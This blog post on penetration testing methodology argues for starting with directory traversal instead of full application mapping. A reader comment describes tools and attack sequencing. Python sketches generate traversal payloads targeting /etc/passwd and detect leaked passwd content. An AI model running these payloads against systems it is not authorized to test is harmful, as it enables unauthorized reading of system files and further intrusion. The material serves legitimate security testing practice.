Rapid Exploitation

Wherever you put your mind, there you are. – K. Slatoff

The world around you is complex, rich, and quite frankly a bit overwhelming if you try to take it all in at once.  So much so, in fact, that your brain can't make sense of all of it at once.  The very process of observing and analyzing the world takes you away from the experience and filters out much of what is there.  Focusing on one thing causes other things to be ignored, because the whole is so much more than we can handle.  Luckily, we don't generally have to handle it all.

The bits and pieces we actually focus on give us what we need to decide what should happen next.  This is the natural premise that John Boyd outlines with his OODA loop.  We experience the world through this process of pulling in intel, figuring out what needs focus, deciding what to do, and then acting on it.  Often the action we take is to obtain supplemental information, allowing for better insight to decide and act against.  The military, especially the Marine Corps, has invested a huge amount of effort and strategy in this OODA concept.  It is the lifeblood of maneuver warfare.

For my part, I've been trying to extract the principles and concepts of this warfighting methodology into my work.  I've been retooling my testing approach to be more rapid, strategic, and natural.  I've already discussed how certain targets make more sense from a breaching perspective, but I've also recently come to believe that most information collected outside of those targets isn't tremendously useful.  In fact, though some might call this heresy, I think most of the methodology I've reviewed is deeply flawed as it pertains to information gathering.  Nearly every approach suggests a massive up-front effort, then wants you to weed your way through it to discern what is vulnerable.  The waterfall approach works only in limited scenarios for building software; I'm not sure why we think it would work for testing it.

"The purpose of analysis is not to understand the universe, but to direct you toward focused action." – Flawless Consulting

Consider, then, how your body works naturally.  If you flood it with too much information, you can't act on it.  You quickly become overloaded with noise, which distracts you from being able to orient, decide, and act.  Yet most methodologies point you toward some form of "application mapping."  On the surface, having a collection of every single possible fuzzable parameter seems enticing.  But in reality, what do you plan on doing with that list?  Would it make sense to turn on every TV in your home, and every radio, and try to listen to a single song?  Without any context, how could you possibly know which of those parameters are control points?  Without any context, are you really planning on throwing every single payload in fuzzdb against them?  Without context, how would you be able to tell whether a simple modification to those payloads would make all the difference?  The short answer is that you can't, or at least not very well.  Some people call this thorough; I think it's mostly an expensive waste of time.

What if I instead started a test by focusing on one strategic vulnerability: directory traversal?  I like to start here because if I can accomplish this, I have the potential to turn the test into an involuntary code review.  I would no longer need a kitchen-sink extraction of all data; I merely want to answer three questions: where, how, and whether it's vulnerable.  For the "where," I'd hunt for file upload and download functionality.  I'd look for how files are served, especially around dynamic content.  Then I would move on to testing the component's "happy path": what should this component normally do?  After watching the successful flow of a handful of pages, I should have enough of the "how" to start testing abuse cases.  I'd focus first on tests that show how different input is handled, and watch how the application behaves when given unexpected things.  Each test provides the answers I need to move from one stage to the next.  Everything has a functional, pragmatic purpose; no wasted movement.
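To make that flow concrete, here is a minimal sketch of the "where/how/whether" probe loop. Everything in it is illustrative: the payload strings, the `fetch` callable standing in for a real HTTP client, and the `/etc/passwd` signature heuristic are assumptions for the example, not any specific tool's API.

```python
# A minimal directory-traversal probe sketch. The payloads and the
# signature check are illustrative; "fetch" is a stand-in for whatever
# client you use against the app's file download functionality.

TRAVERSAL_PAYLOADS = [
    "../../../../etc/passwd",        # classic dot-dot sequence
    "..%2f..%2f..%2fetc%2fpasswd",   # URL-encoded slashes
    "....//....//etc/passwd",        # naive-filter evasion
]

def looks_vulnerable(body: str) -> bool:
    """Heuristic: did a UNIX passwd file leak into the response?"""
    return "root:" in body and ":/bin/" in body

def probe(fetch, payloads=TRAVERSAL_PAYLOADS):
    """fetch(payload) -> response body. Returns payloads that hit."""
    return [p for p in payloads if looks_vulnerable(fetch(p))]
```

Each response you read here doubles as reconnaissance: even a failed payload tells you how the component handles unexpected input, which is the point of the approach above.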

If directory traversal didn't exist, so what?  I've still learned a great deal about the application and how it works.  Because I was gathering information as I went along, that information can be reapplied to the next attack, maybe SQL injection, which would also teach me more about the application.  I continue through my direct breaching points, because they might let me shortcut my visibility problem, until I am done.  Even if they all failed, I'd bet I'd end up with a more concrete understanding of how the application works than if I had gone the other route.

I'd also bet that most people naturally gravitate toward this.  Though other approaches seem well thought out from an academic perspective, in practice I have found them stifling and often wasteful.  Fortunately I get to dogfood my concept every day, and I can say the benefits have been substantial.  Starting with tests that immediately affect the system gives you initiative and concrete experience.  When they succeed, they give you visibility not otherwise possible.  Using a natural strategy designed NOT to overwhelm your mind is pretty great, too.  Working exploits teach you so much about an application, so why not streamline your approach to them?

One last thought: even in one of the best dossiers I've seen put together on attacking a specific site, the focus was only on gathering information relevant to specific, actionable attacks.  The other information was irrelevant to that goal, and subsequently not needed.

Food for thought.

One thought on "Rapid Exploitation"

  1. Hrmn… I like your concept of testing directory traversal first (instead of application mapping). File upload/download features in web applications are usually a good starting point, if available. When they are not available, I tend to look for information or error leakage, especially path disclosures. These will often lead to file read inclusion (similar to or the same as directory traversal, except that file inclusion is even better).

    I think the reason directory traversal is so good as a first move is that there are some really easy checks, such as self-referencing the same file, e.g. "foo/../index.php". This is a key indicator. The interesting BackTrack tool dotdotpwn is capable of creating customized directory traversal lists (I just have it generate them to stdout), which can be loaded into Burp Intruder.

    Taking indicators even further, many user-controllables that become reflected are interesting. These allow easy testing of data validation and encoding principles in use.

    The takeaway here is that it’s not about the attacks, it’s about analyzing the responses so that you can think about what’s good to attack before you do so.

    However, there are plenty of other takeaways. Context is king in app testing, of course. Without context, you might as well be shooting blanks at a Russian roulette party.

    I like breaking things, which means that I like to see anything fall down. The reasons people dislike w3af or other tools are the reasons I like them. If I can't get a simple tool working against an app, then clearly there is something wrong with the app, or something wrong with my tool. I don't want to waste time later in the process trying to figure this out, so it's good to know what pressure I can put on my targets. Simple works well here: curl, skipfish, or Burp won't help as much as DirBuster, because it's more difficult to time and adjust things in, for example, Intruder. By running DirBuster first, you can see the rate of 2xx/3xx/4xx/5xx's, as well as adjust the thread count live. By monitoring with iftop (or iptraf, tcptrace.org, ntop, etc.), you can gauge your network and resource thresholds on both ends. As with nmap, slow is usually a good thing, but you don't want to go too slow. You want to stay below the threshold of fail.

    Application mapping also doesn't have to be as exhaustive as most people make it when leaning on targets. The trick, even as a functional tester, is to identify equivalence classes that lead requests to redundant/recurring responses. Once identified, you can skip those idioms (or save them for later). Some parameters, if they exist, are obvious targets (e.g. names you'd find in a SQL query); some you just have to test to see what you get back from fault injection (e.g. numbers). All of this is a balancing act, but I can see why you'd want to explore off the beaten path. I do the same thing!

    You can perform an automated dorking attack with SearchDiggity at the same time as brute-forcing directories or files with DirBuster (let's call these our appsec chess "pawns"). Then you can get more clever with directory traversals on basic site functionality using Burp Intruder with those dotdotpwn lists (your appsec chess "knights"). Your next move is likely to look for information leakage by crawling (with your "bishops") and identifying default errors (how successful your opening was). By leveraging the null byte or negative/zeroed/out-of-bounds integers, you may successfully cause an error where one would not normally occur in a basic crawl, and these are usually the kind that include a path disclosure or internal IP/hostname (even better might be verbose unhandled exceptions that show app components, variables, stack traces, or other app internals that you can google for). You've now completed an opening and move on to the middle game, where you'll want to sit back and look at the board before making any new moves. In penetration testing, this is called "pivoting." Sometimes you may decide to move in for the SQLi kill, or leverage those file upload/download or inclusion attacks to accomplish the same. When there are no avenues for an easy attack involving instant system (or data) integrity compromise, you need to focus on smaller vulnerabilities that, when combined, will eventually take the opponent down: XSS, CSRF, Ajax issues, and clickjacking, or authentication, session management, and authorization. In other words, focus on taking one pawn at a time in a way that leads you into a better position, instead of the bigger pieces you would otherwise waste time and effort on, or a series of pawn captures that don't improve your position.
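The dotdotpwn-style lists mentioned in the comment (generated to stdout, then loaded into Burp Intruder) can be approximated in a few lines. This is a sketch, not dotdotpwn's actual output format: the target filename, depth limit, and the single URL-encoding variant are illustrative defaults.

```python
# Generate dot-dot traversal strings at increasing depth, in plain and
# URL-encoded forms, suitable for pasting into an Intruder-style payload
# list. The defaults here are illustrative, not dotdotpwn's real output.

def traversal_list(target="etc/passwd", max_depth=6):
    payloads = []
    for depth in range(1, max_depth + 1):
        prefix = "../" * depth
        payloads.append(prefix + target)                        # plain
        payloads.append((prefix + target).replace("/", "%2f"))  # encoded slashes
    return payloads

if __name__ == "__main__":
    # Mirror the "generate to stdout" workflow described above.
    print("\n".join(traversal_list()))
```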
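The live 2xx/3xx/4xx/5xx rate that makes DirBuster useful for gauging pressure on a target is easy to reproduce for any tool's output. A minimal sketch, assuming you have a list of response status codes from whatever client you ran:

```python
from collections import Counter

def status_classes(status_codes):
    """Bucket HTTP status codes into 2xx/3xx/4xx/5xx counts, the same
    signal DirBuster shows live while brute-forcing directories."""
    return Counter(f"{code // 100}xx" for code in status_codes)
```

Watching these buckets shift as you adjust thread count or payload sets is the "stay below the threshold of fail" feedback loop described above.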
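The equivalence-class idea from the comment, skipping requests that would produce redundant or recurring responses, can be sketched by normalizing variable path segments. The normalization rules below (numeric segments collapse to `{id}`, long hex-looking tokens to `{hash}`) are assumptions chosen for illustration; real rules would come from observing the target.

```python
import re

def equivalence_class(path: str) -> str:
    """Collapse variable path segments so requests that should yield
    structurally identical responses map to the same class. The two
    rules here are illustrative, not exhaustive."""
    path = re.sub(r"\b\d+\b", "{id}", path)          # /item/42 -> /item/{id}
    path = re.sub(r"\b[0-9a-f]{16,}\b", "{hash}", path)
    return path

def dedupe(paths):
    """Keep one representative path per equivalence class."""
    seen, reps = set(), []
    for p in paths:
        key = equivalence_class(p)
        if key not in seen:
            seen.add(key)
            reps.append(p)
    return reps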
